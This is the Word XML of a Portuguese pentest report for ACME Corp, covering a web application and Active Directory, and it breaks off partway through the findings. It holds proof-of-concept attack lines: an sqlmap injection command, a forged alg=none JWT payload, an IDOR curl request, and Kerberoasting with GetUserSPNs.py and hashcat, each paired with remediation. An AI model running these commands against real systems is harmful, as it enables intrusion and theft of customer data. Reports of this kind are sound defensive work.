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194FE3"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">SURICATOOS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF7678"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RELATÓRIO DE PENTEST · PTES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Avaliação de Segurança Ofensiva — Aplicação Web e Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Preparado por Suricatoos para</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="5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14%"/>
            <w:shd w:fill="FF76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0F172A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">  ACME Corp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF7678"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIDENCIAL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Período</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr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02/06/2026 – 06/06/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="26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pct" w:w="26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Autor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr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Equipe Red Team — Suricatoos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="26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Contato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr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redteam@suricatoos.example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="26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Risco geral</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr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82/100 (CRÍTICO)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="26%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Metodologia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr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PTES — Penetration Testing Execution Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">SEÇÃO 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Sumário Executivo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A Suricatoos conduziu uma avaliação ofensiva autônoma, orientada pela metodologia PTES, contra a superfície web e a infraestrutura Active Directory autorizadas da ACME Corp.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O engajamento identificou uma postura de risco ALTA: foi possível encadear vulnerabilidades de aplicação até o comprometimento de uma conta privilegiada do domínio de teste, demonstrando um caminho plausível para exposição de toda a base de clientes e controle administrativo do ambiente.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Os achados mais graves — bypass de autenticação por JWT inseguro e injeção de SQL — são exploráveis remotamente, sem autenticação prévia, e devem ser tratados de forma imediata. A seção de recomendações apresenta um roteiro de remediação priorizado por risco de negócio.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190750" cy="1628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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10 achados   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2 críticos   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="059669"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2 quick wins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">SEÇÃO 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Narrativa do Ataque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Do reconhecimento ao impacto: como achados isolados se encadeiam em um caminho real de comprometimento.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80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Reconhecimento  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">A partir de fontes públicas e enumeração autorizada, mapeamos a loja, a API de pedidos e o acesso remoto (VPN), além de um caminho para a rede interna. A superfície exposta já indicava controles de autenticação frágeis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Ponto de entrada  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">[F-01]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">A API aceitava tokens JWT sem assinatura (alg=none). Forjamos um token de administrador e obtivemos acesso privilegiado à API — sem precisar de credenciais válidas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Acesso aos dados  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">[F-02, F-03]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">A busca da loja era vulnerável a SQL Injection, permitindo leitura do banco. Em paralelo, uma falha de autorização (IDOR) expunha pedidos e dados pessoais de outros clientes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Pivô para a rede interna  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">[F-07]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">O acesso remoto via VPN não exigia segundo fator. Com credenciais obtidas, entramos na rede interna, atingindo o domínio Active Directory de teste.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Escalada de privilégios  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">[F-04]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Uma conta de serviço com senha fraca permitiu Kerberoasting: extraímos e quebramos o hash offline, assumindo uma conta privilegiada do domínio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Impacto demonstrado  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Encadeando os achados, demonstramos um caminho plausível para expor toda a base de clientes e assumir controle administrativo do ambiente — tudo com provas de conceito não destrutivas, dentro do escopo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">SEÇÃO 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Visão Geral de Risco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Distribuição de risco por probabilidade e impacto, e concentração por categoria de superfície avaliada.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667000" cy="2667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857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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">■ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Crítico    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">■ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Alto    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D97706"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">■ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Médio    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2563EB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">■ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Baixo    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">■ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Info    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">SEÇÃO 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Metodologia (PTES)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O engajamento seguiu as sete fases do Penetration Testing Execution Standard (PTES).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1. Interações pré-engajamento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Definição de escopo, janelas e regras de engajamento (RoE).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Acordo de confidencialidade e canais de comunicação de emergência.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2. Coleta de inteligência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OSINT e enumeração passiva de subdomínios (CT logs, DNS).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Fingerprinting de tecnologias, versões e superfícies expostas.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3. Modelagem de ameaças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Mapeamento de ativos críticos e fluxos de dados (PII, pagamentos).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Identificação de atores e cenários de ataque prioritários.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4. Análise de vulnerabilidades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Análise de autenticação, sessão e autorização (IDOR/BOLA).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Testes de injeção, configuração de TLS e cabeçalhos de segurança.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5. Exploração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Validação prática (PoC) dos achados de aplicação e rede.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Bypass de autenticação, extração inferencial de dados e XSS armazenado.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6. Pós-exploração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Movimentação lateral e abuso de Kerberos no domínio de teste.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Demonstração de impacto encadeado, sem ações destrutivas.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7. Relatório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Consolidação de evidências, classificação de risco e recomendações.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34155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Roteiro de remediação priorizado e reteste sugerido.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">SEÇÃO 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Achados Detalhados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pct" w:w="56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Achado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="14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pct" w:w="8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CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="14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Categoria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SQL Injection (boolean/time-based) em /buscar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B91C1C"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Crítico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9.4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Aplicação Web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Bypass de autenticação via JWT com alg=none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B91C1C"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Crítico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9.1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Aplicação Web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IDOR/BOLA em /api/v1/orders/{id}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8.1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API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Kerberoasting de conta de serviço (svc_sql)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8.0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Active Directory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Ausência de MFA no acesso VPN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Médio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6.5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Rede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Cross-Site Scripting armazenado em avaliações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Médio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6.1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Aplicação Web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SMB signing desabilitado (NTLM relay)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Médio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5.9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Rede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Cabeçalhos de segurança e configuração TLS fracos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6"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Baixo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3.7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Configuração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Divulgação de informação em mensagens de erro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6"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Baixo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3.1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Aplicação Web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F-10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Divulgação de versões de software (banners)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64748B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Info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0.0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6"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Configuração</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detalhamento dos achados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B91C1C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F-02 — SQL Injection (boolean/time-based) em /buscar  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">CRÍTICO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 9.4 · CWE-89 · Aplicação Web · Afetado: loja.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B91C1C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O parâmetro "q" do endpoint de busca é concatenado diretamente na consulta SQL. A extração inferencial de dados foi confirmada (boolean e time-based), permitindo leitura arbitrária do banco.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmação de injeção (PoC de leitura, não destrutiva)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sqlmap -u "https://loja.acme.example/buscar?q=tenis" \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--batch --technique=BT --dbms=postgres --banner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# parameter 'q' is injectable (boolean-based, time-based)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B91C1C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Exfiltração potencial de toda a base de dados (clientes, pedidos, hashes de senha).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B91C1C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Usar consultas parametrizadas/prepared statements e ORM seguro; adicionar WAF como camada defensiva e princípio do menor privilégio no usuário de banco.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B91C1C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F-01 — Bypass de autenticação via JWT com alg=none  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">CRÍTICO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 9.1 · CWE-347 · Aplicação Web · Afetado: api.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B91C1C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A API aceita tokens JWT com o cabeçalho {"alg":"none"}, ignorando a verificação de assinatura. Um atacante pode forjar tokens arbitrários, assumindo qualquer identidade e elevando privilégios para administrador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">Token forjado (sem assinatura) elevando para role=admin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header  = {"alg":"none","typ":"JWT"}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payload = {"sub":"10231","role":"admin"}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# aceito por api.acme.example -&gt; acesso a endpoints administrativos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B91C1C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Acesso administrativo completo à API, incluindo dados de todos os clientes e operações privilegiadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B91C1C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Fixar o algoritmo esperado (ex.: RS256) no verificador e rejeitar explicitamente "none"; rotacionar segredos e invalidar sessões emitidas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="EA580C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F-03 — IDOR/BOLA em /api/v1/orders/{id}  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 8.1 · CWE-639 · API · Afetado: api.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="EA580C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Um usuário autenticado lê pedidos de outros clientes apenas alterando o identificador, sem verificação de propriedade no servidor (Broken Object Level Authorization).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">Acesso ao pedido de outro cliente trocando o id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curl -s https://api.acme.example/api/v1/orders/10232 \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-H "Authorization: Bearer $TOKEN_A" | jq '{id, customer, total, address}'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# -&gt; retorna PII de cliente DISTINTO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="EA580C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Exposição de PII e histórico de compras de toda a base de clientes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="EA580C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Validar a propriedade do objeto no servidor (order.customer_id == session.user_id) e usar referências indiretas por usuário; incluir testes de autorização por objeto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="EA580C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F-04 — Kerberoasting de conta de serviço (svc_sql)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS 8.0 · MITRE T1558.003 · Active Directory · Afetado: DC01 (10.20.10.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="EA580C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A conta de serviço svc_sql possui SPN e senha fraca, permitindo solicitar um ticket TGS e quebrar o hash offline, resultando em credenciais privilegiadas no domínio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">Extração e quebra offline do hash de serviço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GetUserSPNs.py acme.example/teste:'&lt;senha-lab&gt;' -dc-ip 10.20.10.5 -request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hashcat -m 13100 svc_sql.hash rockyou.txt   # senha recuperada offline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="EA580C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Movimentação lateral e elevação para conta privilegiada do domínio de teste.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="EA580C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Adotar gMSA ou senhas longas/aleatórias para contas de serviço; monitorar solicitações TGS-REQ anômalas e remover SPNs desnecessários.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706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F-07 — Ausência de MFA no acesso VPN  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">MÉDIO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
